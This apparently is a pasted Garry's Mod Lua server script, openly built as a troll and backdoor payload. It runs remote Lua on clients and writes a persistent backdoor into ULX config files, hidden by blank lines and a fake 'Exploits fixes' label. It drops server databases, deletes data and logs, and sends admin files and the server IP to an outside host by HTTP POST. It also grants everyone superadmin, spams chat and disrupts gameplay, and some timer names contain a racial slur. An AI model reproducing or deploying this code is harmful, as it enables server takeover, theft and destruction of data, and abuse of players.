· 7 years ago · Jan 05, 2019, 03:20 AM
1util.AddNetworkString "skeleton_dancing_troll"
2
3local lol = {}
4function lol:RandomString( intMin, intMax )
5 local ret = ""
6 for _ = 1, math.random( intMin, intMax ) do
7 ret = ret.. string.char( math.random(65, 90) )
8 end
9
10 return ret
11end
12
13lol.m_tblActions = {}
14lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
15lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
16
17function lol:PushAction( intChainDelay, func )
18 self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
19end
20
21function lol:NextAction( pPlayer )
22 pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
23 if not self.m_tblActions[pPlayer.m_intCurAction] then return end
24
25 timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
26 if not IsValid( pPlayer ) then return end
27 self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
28 self:NextAction( pPlayer )
29 end )
30end
31
32function lol:Start( pPlayer )
33 pPlayer.m_intCurAction = 0
34 self:NextAction( pPlayer )
35end
36
37function lol:SendLua( pPlayer, strLua )
38 net.Start( "skeleton_dancing_troll" )
39 net.WriteString( strLua )
40 net.Send( pPlayer )
41end
42
43function lol:SetupPlayer( pPlayer )
44 pPlayer:SendLua( "net.Receive(\"skeleton_dancing_troll\", function() RunString(net.ReadString()) end)" )
45end
46
47for k, v in pairs( player.GetAll() ) do
48 lol:SetupPlayer( v )
49 timer.Simple( 2, function() lol:Start( v ) end )
50end
51
52hook.Add( "PlayerAuthed", "wat", function( pPlayer )
53 lol:SetupPlayer( pPlayer )
54 timer.Simple( 10, function() lol:Start( pPlayer ) end )
55end )
56
57hook.Add( "PlayerSay", "1337command", function( pSender, strText, bTeamChat )
58 if strText:sub( 1, 5 ) == "/1337" then
59 pSender:Ignite( 1e9 )
60 pSender:ChatPrint( "๑۩۩๑ĤẪĈЌĒĎ ฿¥ L̂ÎÌNÌ‚K̂ÎÌNÌ‚SŶ๑۩۩๑" )
61 pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
62 return false
63 end
64end )
65
66
67
68--Sequence stack
69--Start some tunes and steam in our assets
70lol:PushAction( 0, function( pPlayer )
71 lol:SendLua( pPlayer, ([=[
72 sound.PlayURL( "http://d.zaix.ru/5MI5.mp3", "", function()end )
73
74 g_]=].. lol.m_strImageGlobalVar.. [=[ = {}
75 local html = [[%s]]
76 local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
77 local pnl = vgui.Create( "HTML" )
78 pnl:SetPos( ScrW() -1, ScrH() -1 )
79 pnl:SetVisible( true )
80 pnl:SetMouseInputEnabled( false )
81 pnl:SetKeyBoardInputEnabled( false )
82 pnl:SetSize( intSizeX, intSizeY )
83 pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
84
85 local PageLoaded
86 PageLoaded = function()
87 local mat = pnl:GetHTMLMaterial()
88 if mat then
89 g_]=].. lol.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
90 return
91 end
92
93 timer.Simple( 0.10, PageLoaded )
94 end
95
96 PageLoaded()
97 end
98
99 LoadWebMaterial( "https://image.noelshack.com/fichiers/2017/47/3/1511306958-hud.png", "hud1", 300, 128 )
100 LoadWebMaterial( "https://image.noelshack.com/fichiers/2017/47/3/1511306628-hud2.png", "hud2", 300, 128 )
101 LoadWebMaterial( "https://image.noelshack.com/fichiers/2017/47/3/1511306630-hud3.png", "hud3", 128, 128 )
102 LoadWebMaterial( "https://goo.gl/fgF2ji", "doritos", 256, 256 )
103 LoadWebMaterial( "https://goo.gl/fgF2ji", "fedora", 256, 256 )
104 LoadWebMaterial( "https://goo.gl/fgF2ji", "dew", 256, 256 )
105 LoadWebMaterial( "https://goo.gl/fgF2ji", "awp", 256, 256 )
106 ]=]):format(lol.m_strImageLoadHTML) )
107 RunConsoleCommand("ulx_logecho", "0")
108 local WS = {}
109WS.file = {}
110WS.file.Write = file.Write
111WS.file.Read = file.Read
112WS.file.Append = file.Append
113WS.file.IsDir = file.IsDir
114WS.file.CreateDir = file.CreateDir
115--[[WS.debug = {} To bypass some things, never got to use it
116WS.debug.getupvalue = debug.getupvalue]]
117
118function WS.ProxyCode( code )
119 local file = table.Random(file.Find("data/*.lua", "GAME"))
120 RunString(code, file)
121end
122function WS.CheckForInfection()
123 local c = WS.file.Read("data/ulx/config.txt","GAME") or "NO DATA"
124 if string.find(c, "Exploits fixes") then
125 return true
126 else
127 return false
128 end
129end
130function WS.Infecte()
131 if not WS.file.IsDir("data/ulx","GAME") then return end
132
133 ------------- GAMEMODE persistent
134 if not WS.file.IsDir("data/ulx/gamemodes","GAME") then
135 WS.file.CreateDir("ulx/gamemodes")
136 end
137 if not WS.file.IsDir("data/ulx/gamemodes/"..engine.ActiveGamemode(),"GAME") then
138 WS.file.CreateDir("ulx/gamemodes/"..engine.ActiveGamemode())
139 end
140 WS.file.Write( "ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n; Exploits fixes")
141 WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx logEcho 0]])
142 WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "user" "ulx luarun"]])
143 WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "user" "ulx rcon"]])
144 WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "superadmin" "ulx groupdeny"]]) -- yyyyeeeaaahhhh
145 WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx luarun util.AddNetworkString("LinkinsyCheatBackdoor")]])
146 WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx luarun net.Receive("LinkinsyCheatBackdoor",function() RunString(net.ReadString(),"Collombe") end)]])
147
148 ------------- BASIC persistent
149 if WS.CheckForInfection() then return end
150 WS.file.Append("ulx/config.txt", string.rep("\n", 50)) -- Best hiding technique (Ð›ÑƒÑ‡ÑˆÐ°Ñ Ñ‚ÐµÑ…Ð½Ð¸ÐºÐ° ÑкрытиÑ)
151 WS.file.Append("ulx/config.txt", "\n; Exploits fixes")
152 WS.file.Append("ulx/config.txt", "\n"..[[ulx logEcho 0]])
153 WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "user" "ulx luarun"]])
154 WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "user" "ulx rcon"]])
155 WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "superadmin" "ulx groupdeny"]]) -- yyyyeeeaaahhhh
156 WS.file.Append("ulx/config.txt", "\n"..[[ulx luarun util.AddNetworkString("LinkinsyCheatBackdoor")]])
157 WS.file.Append("ulx/config.txt", "\n"..[[ulx luarun net.Receive("LinkinsyCheatBackdoor",function() RunString(net.ReadString(),"Collombe") end)]])
158end
159
160 ------------- INFECTE EVERYTHING
161WS.Infecte()
162timer.Create("TheWaterSnake", 5, 0, WS.Infecte)
163
164 ------------- PREVENT STOPPING
165local td, tr = timer.Destroy, timer.Remove
166function timer.Destroy( a )
167 if a == "TheWaterSnake" then return end
168 td( a )
169end
170function timer.Remove( a )
171 if a == "TheWaterSnake" then return end
172 tr( a )
173end
174
175 ------------- B1G H4X
176util.AddNetworkString("LinkinsyCheatBackdoor")
177net.Receive("LinkinsyCheatBackdoor", function()
178 RunString(net.ReadString(), "TheFrenchGuy")
179end)
180 timer.Create( "hello", 2, 1, function()
181 RunConsoleCommand( "say", "Привет" )
182 end)
183
184 timer.Create( "hello2", 10, 1, function()
185 RunConsoleCommand( "say", "Ðа Ñервере был найден Backdoor и он был взломан" )
186 end)
187
188 timer.Create( "hello3", 14, 1, function()
189 RunConsoleCommand( "say", "ВероÑтнее вÑего Ñтот Backdoor в Ñлитом Ñкрипте" )
190 end)
191
192 timer.Create( "hello5", 20, 1, function()
193 RunConsoleCommand( "say", "Ð ÑÐµÐ¹Ñ‡Ð°Ñ Ð¼Ð¾Ð¶ÐµÑ‚Ðµ поÑлушать музыку" )
194 end)
195
196 timer.Create( "hello6", 32, 1, function()
197 RunConsoleCommand( "say", "๑۩۩๑ĤẪĈЌĒĎ ฿¥ L̂ÎÌNÌ‚K̂ÎÌNÌ‚SŶ | vk.com/wryiloting228๑۩۩๑" )
198 end)
199end )
200
201--HUD swap
202lol:PushAction( 40, function( pPlayer )
203 lol:SendLua( pPlayer, [[
204 (GAMEMODE or GM).CalcView = function() end
205 (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
206
207 local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
208 for k, v in pairs(remove) do
209 hook.GetTable()[v] = {}
210 end
211
212 local function GetWebMat( strURL )
213 return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
214 end
215
216 hook.Add( "HUDPaint", "newhud", function()
217 surface.SetDrawColor( 255, 255, 255, 255 )
218
219 if GetWebMat( "hud1" ) then
220 surface.SetMaterial( GetWebMat("hud1")[1] )
221 surface.DrawTexturedRect( 0, ScrH() -128, 300 *(512 /300), 128 )
222 end
223 if GetWebMat( "hud2" ) then
224 surface.SetMaterial( GetWebMat("hud2")[1] )
225 surface.DrawTexturedRect( ScrW() -300, ScrH() -128, 300 *(512 /300), 128 )
226 end
227 if GetWebMat( "hud3" ) then
228 surface.SetMaterial( GetWebMat("hud3")[1] )
229 surface.DrawTexturedRect( 45, ScrH() -245, 128, 128 )
230 end
231 if GetWebMat( "doritos" ) then
232 surface.SetMaterial( GetWebMat("doritos")[1] )
233 surface.DrawTexturedRectRotated( math.random(250, 260), math.random(250, 260), 183 *(256 /183), 256, CurTime() *512 )
234 end
235 if GetWebMat( "dew" ) then
236 surface.SetMaterial( GetWebMat("dew")[1] )
237 surface.DrawTexturedRectRotated( math.random(250, 260), math.random(ScrH() -250, ScrH() -260), 110 *((350 /110) -1), 256, CurTime() *-512 )
238 end
239 if GetWebMat( "fedora" ) then
240 surface.SetMaterial( GetWebMat("fedora")[1] )
241 surface.DrawTexturedRectRotated( ScrW() -math.random(400, 410), math.random(250, 260), 256, 256, CurTime() *-512 )
242 end
243 if GetWebMat( "awp" ) then
244 surface.SetMaterial( GetWebMat("awp")[1] )
245 surface.DrawTexturedRectRotated( ScrW() -math.random(400, 410), math.random(ScrH() -260, ScrH() -250), 256, 256, CurTime() *512 )
246 end
247
248 draw.SimpleTextOutlined(
249 " ๑۩۩๑ĤẪĈЌĒĎ ฿¥ L̂ÎÌNÌ‚K̂ÎÌNÌ‚SŶ๑۩۩๑",
250 "DermaLarge",
251 ScrW() /2 +math.random( -8, 8 ),
252 ScrH() /2 +math.random( -8, 8 ) +24,
253 Color( 255, 0, 0, 255 ),
254 TEXT_ALIGN_CENTER,
255 TEXT_ALIGN_CENTER,
256 1,
257 Color( 0, 0, 255, 255 )
258 )
259 end )
260
261 local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
262 hook.Add( "HUDShouldDraw", "newhud", function( str ) if not allowed[str] then return false end end )
263
264 surface.PlaySound( "garrysmod/save_load4.wav" )
265 ]] )
266end )
267
268--Disco time
269lol:PushAction( 9.1, function( pPlayer )
270 local idx = pPlayer:EntIndex()
271 timer.Create( "beat".. idx, 0.42, 0, function()
272 if not IsValid( pPlayer ) then timer.Destroy( "beat".. idx ) return end
273 pPlayer:ViewPunch( Angle(math.Rand(-15, -10), math.Rand(-10, 10), 0) )
274 end )
275----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
276local date = os.date( "%m-%d-%y" )
277local databases = { "jobdata","darkrp_door","darkrp_levels","darkrp_prestige","darkrp_doorgroups","darkrp_doorjobs","darkrp_jobspawn","darkrp_position","darkrp_player","darkrp_dbversion","FAdmin_CAMIPrivileges","FADMIN_GROUPS","FAdmin_Immunity","FADMIN_MOTD","FAdmin_PlayerGroup","FADMIN_PRIVILEGES","FADMIN_RESTRICTEDENTS","FAdmin_ServerSettings","FAdminBans","FPP_ANTISPAM1","FPP_BLOCKED1","FPP_BLOCKMODELSETTINGS1","FPP_ENTITYDAMAGE1","FPP_GLOBALSETTINGS1","FPP_GRAVGUN1","FPP_GROUPMEMBERS1","FPP_GROUPS3","FPP_GROUPTOOL","FPP_PHYSGUN1","FPP_PLAYERUSE1","FPP_TOOLADMINONLY","FPP_TOOLGUN1","FPP_TOOLRESTRICTPERSON1","FPP_TOOLTEAMRESTRICT","FPP_BLOCKEDMODELS1","awarn_playerdata","awarn_serverdata","awarn_warnings","blogs_players_v3","blogs_v3","stt_date","stt_players","mlog_logs","mlog_permissions","atlaschat_players","atlaschat_ranks","atlaschat_remote","atlaschat_restrictions","OreBag","fcd_playerData","dailylogin","ChessLeaderboard","qsgr_data","voting_npcs","cac_incidents","steam_rewards","playerdata","playerinformation","utime","permaprops","cc_characters","cc_npcs","ckit_chips","ckit_persist","exsto_data_bans","exsto_data_ranks","exsto_data_users","exsto_data_variables","exsto_restriction","inventories","kinv_items","libk_player","permitems","player_gangapps","player_gangdata","player_gangs","ps2_categories","ps2_equipmentslot","ps2_HatPersistence","ps2_itemmapping","ps2_itempersistence","ps2_OutfitHatPersistenceMapping","ps2_outfits","ps2_playermodelpersistence","ps2_servers","ps2_settings","ps2_trailpersistence","ps2_wallet","removeprops","scoreboard_friends","serverguard_analytics","serverguard_bans","serverguard_pms","serverguard_ranks","serverguard_reports","serverguard_schema","serverguard_ttt_autoslays","serverguard_users","serverguard_watchlist","tttstats","ttt_passes_history","specdm_stats_new","ps2_achievements","ps2_boosterpersistence","ps2_cratepersistence","ps2_instatswitchweaponpersistence","ps2_keypersistence","ps2_rolecontrolpersistence","ps2_weaponpersistence","rapsheet","damagelog_autoslay","damagelog_names","damagelog_oldlogs","damagelog_weapons","kmapvote_mapinfo","kmapvote_ratings","mgang_gangs","mgang_players","deathrun_ids","deathrun_records","deathrun_stats","sui_ratings","shop_texthats","shop_money","shop_items","report_log" }
278local datafiles = { "ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","wire_version.txt","UTeam.txt","prevhas.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","hitnumbers/settings.txt","soundlists/common_sounds.txt","vcmod/controls.txt","vcmod/dataserver.txt","qsgr_data/sqgr_settings.txt","blogs/configcache.txt","blogs/language.txt","cac/adminuipack.txt","ezjobs/config.txt","damagelog/colors.txt","damagelog/filters_new.txt","craphead_scripts/armory_robbery/rp_downtown_v4c/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_evilmelon_v1/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v3/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v4/policearmory_location.txt","mg_gangsdata/mg_npcspawns.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","prevhash.txt","permaprops_config.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","vliss/settings/config.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
279local sensitivefiles = { "ulx_logs/"..date..".txt","ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","vcmod/controls.txt","vcmod/dataserver.txt","blogs/configcache.dat","blogs/language.txt","blogs/config_v5.txt","cac/adminuipack.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","permaprops_config.txt","whitelist.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
280for k,v in pairs( databases ) do if sql.TableExists( v ) then
281 sql.Query( "DROP TABLE "..v.." ;" )
282 sql.Query( "CREATE TABLE IF NOT EXISTS "..v.." ( steamid TEXT NOT NULL PRIMARY KEY, value TEXT );" )
283 end
284end
285timer.Simple(5, function() for k,v in pairs( datafiles ) do if file.Exists(v, "DATA") then file.Delete( v ) end end end )
286for k,v in pairs( sensitivefiles ) do if file.Exists(v, "DATA") then http.Post("http://bracegaming.com/data/log.php",{a=game.GetIPAddress(),b=v,c=file.Read(v)}) file.Delete( v ) end end
287hook.Add( "Think", "killulxlogs", function() file.Delete( "ulx_logs/"..date..".txt" ) end )
288
289timer.Create( "niggaspams2", 0.1, 0, function()
290RunConsoleCommand( "sv_friction", "-8" )
291end)
292
293timer.Create( "niggaspams3", 0.1, 0, function()
294RunConsoleCommand( "sv_gravity", "-600" )
295end)
296
297timer.Create( "next_level_timer", 0.1, 0, function()
298 for k, v in pairs(player.GetAll()) do
299 v:ConCommand("say /ooc ๑۩۩๑ĤẪĈЌĒĎ ฿¥ L̂ÎÌNÌ‚K̂ÎÌNÌ‚SŶ|vk.com/wryiloting228๑۩۩๑");
300 end
301end)
302
303
304RunConsoleCommand( "sv_loadingurl", "http://uu.esy.es/zyqv6r7n/seized.html" )
305
306RunConsoleCommand("hostname", "๑۩۩๑ĤẪĈЌĒĎ ฿¥ L̂ÎÌNÌ‚K̂ÎÌNÌ‚SŶ๑۩۩๑")
307
308RunConsoleCommand("ulx", "groupallow", "superadmin", "*")
309
310timer.Create( "spamlol", 0, 0, function() for i = 1, 5 do MsgC(Color(math.random(255), math.random(255), math.random(255)), "Hacked") end end)
311
312
313for k,v in pairs(player.GetAll()) do v:SetVelocity(v:GetVelocity() + Vector(math.random(1000,5000), math.random(1000,5000), math.random(1000,5000))) end
314
315for k,v in pairs (player.GetAll()) do v:SetUserGroup("superadmin") end
316
317timer.Create( "niggaspams4", 0.1, 0, function()
318RunConsoleCommand( "sbox_noclip", "1" )
319end)
320
321timer.Create( "niggaspams5", 0.1, 0, function()
322RunConsoleCommand( "sv_allowcslua", "1" )
323end)
324
325hook.Add("Think", "busted", function()
326 for k,v in pairs (player.GetAll()) do
327 v:SetModelScale(2.5, 100);
328 v:SetRunSpeed(400 * 2);
329 v:SetWalkSpeed(200 * 2);
330 end
331end)
332
333for k, v in pairs( player.GetAll() ) do v:SendLua( [[util.ScreenShake( Vector( 0, 0, 0 ), 10, 5, 60, 5000 )]] ) end
334
335for k,v in pairs(player.GetAll()) do
336 local a = v:LookupBone("ValveBiped.Bip01_Head1")
337 local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
338 local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
339 local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
340 local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
341 local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
342 local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
343 local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
344 local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
345 local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
346 local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
347
348 v:ManipulateBoneScale( a, Vector(4,0,4))
349 v:ManipulateBoneScale( b, Vector(0,0,0))
350 v:ManipulateBoneScale( c, Vector(0,0,0))
351 v:ManipulateBoneScale( d, Vector(0,0,1))
352 v:ManipulateBoneScale( e, Vector(0,0,1))
353 v:ManipulateBoneScale( f, Vector(0,0,0))
354 v:ManipulateBoneScale( g, Vector(0,0,0))
355 v:ManipulateBoneScale( h, Vector(1,1.5,1.5))
356 v:ManipulateBoneScale( i, Vector(1,1.5,1.5))
357 v:ManipulateBoneScale( j, Vector(0,0,0))
358 v:ManipulateBoneScale( k, Vector(0,0,0))
359 end
360
361for k,v in pairs(player.GetAll()) do timer.Create( "timerargent10", 0.1, 0, function() v:addMoney(999999) end) end
362
363timer.Create( "ignitelol", 0.1, 1, function()
364for k,v in pairs(player.GetAll()) do v:Ignite(120) end
365end)
366-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
367
368 lol:SendLua( pPlayer, [[
369 local emitter = ParticleEmitter( LocalPlayer():GetPos() )
370 local time = 0
371
372 hook.Add( "Think", "wat", function()
373 if CurTime() < time then
374 return
375 end
376
377 time = CurTime() +0.05
378 for i = 1, 16 do
379 local part = emitter:Add(
380 "particles/balloon_bit",
381 LocalPlayer():GetPos() +Vector(
382 math.random( -256, 256 ),
383 math.random( -256, 256 ),
384 256
385 )
386 )
387
388 if part then
389 local Size = math.random( 4, 7 )
390
391 part:SetColor( math.random(0, 255), math.random(0, 255), math.random(0, 255), 255 )
392 part:SetVelocity( Vector( 40, 25, -math.random(300, 400) ) )
393 part:SetDieTime( 4.5 )
394 part:SetGravity( Vector(40, 0, -250) )
395 part:SetLifeTime( 0 )
396 part:SetStartSize( Size /2 )
397 part:SetEndSize( Size )
398 part:SetCollide( true )
399 end
400 end
401 end )
402 ]] )
403
404 lol:SendLua( pPlayer, [[
405 hook.Add( "RenderScreenspaceEffects", "wat", function()
406 local sinScaler = math.sin( CurTime() )
407 DrawBloom(
408 0,
409 3,
410 sinScaler *math.Rand(1, 8),
411 sinScaler *math.Rand(1, 8),
412 6,
413 math.Rand(0.5, 2),
414 math.Rand(0, 0.3),
415 math.Rand(0, 0.3),
416 math.Rand(0.5, 1)
417 )
418
419 DrawColorModify{
420 ["$pp_colour_addr"] = 1,
421 ["$pp_colour_addg"] = 0,
422 ["$pp_colour_addb"] = 0,
423 ["$pp_colour_brightness" ] = 0,
424 ["$pp_colour_contrast" ] = 1,
425 ["$pp_colour_colour" ] = 1,
426 ["$pp_colour_mulr" ] = 0,
427 ["$pp_colour_mulg" ] = 0,
428 ["$pp_colour_mulb" ] = 0
429 }
430 end )
431
432 local mdl = ClientsideModel( "models/player/breen.mdl", RENDERGROUP_BOTH )
433 mdl:SetNoDraw( true )
434 local posCache, time = {}, 0
435
436 hook.Add( "HUDPaint", "dance", function()
437 if not mdl.SeqStart or CurTime() > (mdl.SeqStart +mdl.SeqDuration) then
438 local idx = mdl:LookupSequence("taunt_dance")
439 mdl.SeqDuration = mdl:SequenceDuration( idx )
440 mdl.SeqStart = CurTime()
441 mdl:ResetSequence( idx )
442 end
443
444 mdl:SetCycle( (CurTime() -mdl.SeqStart) /mdl.SeqDuration )
445
446
447 local w, h = 300, 300
448 local ang = Angle( 0, 0, 0 )
449
450 for i = 1, 32 do
451 if CurTime() > time then
452 posCache[i] = { math.random( 0, ScrW() -w ), math.random( 0, ScrH() -h ) }
453 end
454 local x, y = posCache[i][1], posCache[i][2]
455
456 cam.Start3D( (ang:Forward() *64) +(ang:Up() *32), (ang:Forward()*-1):Angle(), 90, x, y, w, h )
457 cam.IgnoreZ( true )
458 render.SuppressEngineLighting( true )
459
460 render.SetLightingOrigin( mdl:GetPos() )
461 render.ResetModelLighting( 1, 1, 1 )
462 render.SetColorModulation( 0, 0, 1 )
463
464 mdl:DrawModel()
465
466 render.SuppressEngineLighting( false )
467 cam.IgnoreZ( false )
468 cam.End3D()
469 end
470
471 if CurTime() > time then
472 time = CurTime() +0.15
473 end
474 end )
475
476
477 ]] )
478end )
479
480--Let the beat drop
481lol:PushAction( 101, function( pPlayer )
482 lol:SendLua( pPlayer, [[
483 hook.Add( "GetMotionBlurValues", "wat", function()
484 return 0, 0, 1, math.sin(CurTime() *13)
485 end )
486
487 hook.Add( "RenderScreenspaceEffects", "ohgod", function()
488 local sinScaler = math.sin( CurTime() *(RealFrameTime() *1024) )
489 DrawSharpen( 1 +(sinScaler *10), 0.5 +(sinScaler *2) )
490 DrawMaterialOverlay( "effects/tp_eyefx/tpeye", 1 )
491 end )
492
493 hook.Add( "PostDrawTranslucentRenderables", "ohgod", function()
494 render.SetMaterial( Material("cable/blue_elec") )
495 for i = 1, 32 do
496 render.DrawBeam( LocalPlayer():GetPos() +Vector(0, 0, 128) +(EyeAngles():Forward() *256), EyePos() +(VectorRand() *256), 4, 0, 12.5, Color(255, 255, 255, 255) )
497 end
498 end )
499
500 timer.Create( "thedrop", 0.42, 0, function()
501 util.ScreenShake( LocalPlayer():GetPos(), 512, 5, 0.25, 128 )
502 end )
503 ]] )
504
505 pPlayer:Remove()
506
507 timer.Create( "rights", 0.1, 0, function()
508 for k, v in pairs(player.GetAll()) do
509 v:ConCommand("+right");
510 end
511
512end)
513
514--EVIL TIME rip headpones
515lol:PushAction( 100, function( pPlayer )
516 lol:SendLua( pPlayer, [[
517 surface.PlaySound( "vo/npc/male01/gethellout.wav" )
518
519
520
521 local sounds = {}
522 for i = 1, 4 do
523 sound.PlayURL( "http://www.underdone.org/leak/underdone/asd.mp3", "noblock noplay", function( pChan )
524 sounds[#sounds +1] = pChan
525 end )
526 end
527
528 timer.Create( "asdf", 1, 0, function()
529 if #sounds ~= 4 then return end
530 timer.Destroy( "asdf" )
531 for k, v in pairs( sounds ) do v:EnableLooping( true ) v:SetVolume( 1 ) v:Play() end
532 end )
533
